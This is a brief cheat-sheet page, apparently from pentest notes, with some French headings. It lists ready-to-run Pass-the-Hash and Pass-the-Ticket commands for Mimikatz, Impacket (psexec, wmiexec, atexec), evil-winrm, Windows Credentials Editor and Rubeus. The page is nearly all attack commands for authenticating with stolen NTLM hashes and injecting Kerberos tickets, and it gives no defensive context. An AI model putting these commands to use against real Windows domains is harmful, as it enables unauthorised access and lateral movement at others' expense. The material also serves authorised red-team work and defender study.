🚧Pass the Hash/Ticket
Pass the Hash
Mimikatz :
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
Impacket :
psexec_windows.exe -hashes ":NTHASH" user@<domain>
wmiexec_windows.exe -hashes ":NTHASH" user@<domain>
atexec_windows.exe -hashes ":NTHASH" user@<domain> 'whoami'
EvilWin-RM:
evil-winrm -u <username> -H <Hash> -i <IP>
Windows Credentials Editor :
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
Pass the Ticket
Récupérer les tickets en mémoire :
mimikatz.exe "kerberos::ptt "kirbi_ticket"
.\Rubeus.exe ptt /ticket:kirbi_ticket
Last updated
Was this helpful?